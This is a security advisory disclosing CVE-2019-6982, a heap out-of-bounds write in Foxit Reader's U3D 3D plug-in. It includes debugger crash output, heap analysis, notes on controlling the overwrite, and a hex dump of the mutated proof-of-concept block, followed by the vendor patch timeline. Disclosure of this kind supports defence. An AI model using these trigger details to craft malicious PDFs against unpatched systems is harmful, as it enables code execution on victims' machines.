CVE: CVE-2019-6982

Tested Versions: Foxit Reader 9.0.1.1049, U3DBrowser.fpi 9.0.1.994

Product URL(s): https://www.foxitsoftware.com/pdf-reader/

Foxit Reader is a popular PDF reading and printing software. It provides compatibility to the ECMA-363 Standard (Universal 3D File Format) via the U3DBrowser plug-in, which allows viewing embedded 3D annotations in PDF files. Up to version 9.0.1.1049 the plug-in is loaded in its default installation package, subsequent version continues the support to its user base with the plug-in separately acquired.

Any PDF file that embeds certain specifically crafted 3D content, specifically, a malformed CLOD Mesh Declaration Block that contains invalid Inverse Quantization values, could result in a heap out-of-bounds write of 8 bytes fixed content.

(1624.d1c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=13d0cffc ebx=0bf3efdc ecx=13acefe8 edx=13acef10 esi=1368ff50 edi=1404efe0
eip=688f3739 esp=0031d024 ebp=0031d06c iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210216

U3DBrowser!PlugInMain+0xc5bf9:
688f3739 d95804          fstp    dword ptr [eax+4]    ds:0023:13d0d000=????????

0:000> u
U3DBrowser!PlugInMain+0xc5bf9:
688f3739 d95804          fstp    dword ptr [eax+4]    ; 1st write
688f373c d94108          fld     dword ptr [ecx+8]
688f373f 8b4d10          mov     ecx,dword ptr [ebp+10h]
688f3742 d95808          fstp    dword ptr [eax+8]    ; 2nd write
688f3745 8b450c          mov     eax,dword ptr [ebp+0Ch]
688f3748 8b570c          mov     edx,dword ptr [edi+0Ch]
688f374b 50              push    eax
688f374c 51              push    ecx

0:000> dd eax-20 L10
13d0cfdc  a21fef6c 221fef6c a19fef6c a21fef6c
13d0cfec  221fef6c 219fef6c a21fef6c 221fef6c
13d0cffc  219fef6c ???????? ???????? ????????
13d0d00c  ???????? ???????? ???????? ????????

0:000> !heap -p -a eax
    address 13d0cffc found in
    _DPH_HEAP_ROOT @ b8e1000
    in busy allocation (  DPH_HEAP_BLOCK:    UserAddr     UserSize -     VirtAddr   VirtSize)
                                13d405b0:    13d0b6f0         1910 -     13d0b000       3000
    6e999fcd verifier!AVrfDebugPageHeapAllocate+0x0000029d
    76f06ff4 ntdll!RtlDebugAllocateHeap+0x00000030
    76ed5a8c ntdll!RtlpAllocateHeap+0x000000c0
    76e8dbbd ntdll!RtlAllocateHeap+0x00000243
    6a060269 MSVCR100!malloc+0x00000036
    6a064782 MSVCR100!recalloc+0x0000006b
    68843908 U3DBrowser!PlugInMain+0x00015dc8
    688be90a U3DBrowser!PlugInMain+0x00090dca
    688f3afc U3DBrowser!PlugInMain+0x000c5fbc
    688f3d62 U3DBrowser!PlugInMain+0x000c6222
    688f4dd5 U3DBrowser!PlugInMain+0x000c7295
    [ ... ]

From the crash context above, eax is at the last 4 bytes of the allocated block of size 0x1910. Subsequent instructions will write content of floating point register to [eax+4] and [eax+8]. The buffer being allocated for storing the floating point contents is from MSVCR100!malloc, thus the adjacent heap block can be easily controlled to create a favorable heap overwrite.

Vulnerability

When processing a carefully crafted PDF with 3D stream containing a malformed CLOD Mesh Declaration Block (type 0xFFFFFF31), an attacker can potentially achieve arbitrary code execution at the privilege of the logged on user.

A 1-byte change of the original Position Inverse Quant value 0x3d0a5287 of the Inverse Quantization sub-block in the CLOD Mesh Declaration Block is able to trigger the issue. The contents for the heap overwrite may be indirectly controllable from raw floating point values in the U3D stream. The PoC below shows the original 0xffffff31 block after applying the mutation to 0x1e0a5287.

000002a0: 00 00 00 00 02 00 00 00 31 ff ff ff a1 01 00 00  ........1.......
000002b0: 00 00 00 00 0d 00 42 6f 78 30 31 52 65 73 6f 75  ......Box01Resou
000002c0: 72 63 65 00 00 00 00 00 00 00 00 24 00 00 00 14  rce........$....
000002d0: 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00  ...l............
000002e0: 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00  ................
000002f0: 00 00 00 00 00 00 00 14 00 00 00 2c 01 00 00 2c  ...........,...,
00000300: 01 00 00 2c 01 00 00 87 52 0a 1e a6 05 6f 3b a6  ...,....R.=..o;.
00000310: 05 6f 3b 4a f5 2d 3c 4a f5 2d 3c 66 66 66 3f 00  .o;J.-<J.-<fff?.

Timeline

  • 2018-11-27 Vendor disclosure
  • 2019-01-03 Vendor patched

Vendor Response

The vendor has patched the 3D plugin and acknowledged the security issues at https://www.foxitsoftware.com/support/security-bulletins.php.